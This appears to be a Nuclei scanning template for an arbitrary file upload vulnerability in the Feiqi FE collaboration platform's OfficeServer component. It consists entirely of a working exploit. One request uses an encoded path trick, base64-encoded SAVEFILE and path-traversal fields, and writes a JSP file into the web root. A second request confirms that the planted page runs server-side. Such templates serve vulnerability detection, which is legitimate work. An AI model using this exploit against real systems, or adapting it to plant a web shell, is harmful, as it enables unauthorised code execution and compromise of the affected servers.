id: feiqi-fe-officeserver-file-upload
info:
  name: 飞企互联-FE业务协作平台 OfficeServer 任意文件上传
  author: SleepingBag945
  severity: critical

variables:
  str1: '{{rand_base(8)}}'

http:
  - raw:
      - |
        POST /iweboffice/OfficeServer.js%70 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        DBSTEP V3.0     93                     0        28              DBSTEP=REJTVEVQ
        OPTION=U0FWRUZJTEU=
        RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
        <%out.println("{{str1}}");%>

      - |
        GET /uid.jsp;.js HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    extractors:
      - type: dsl
        name: only_for_sleep
        dsl:
          - wait_for(3)

    matchers:
    
      - type: dsl
        dsl:
          - status_code_2 == 200 && contains(body_2,'{{str1}}')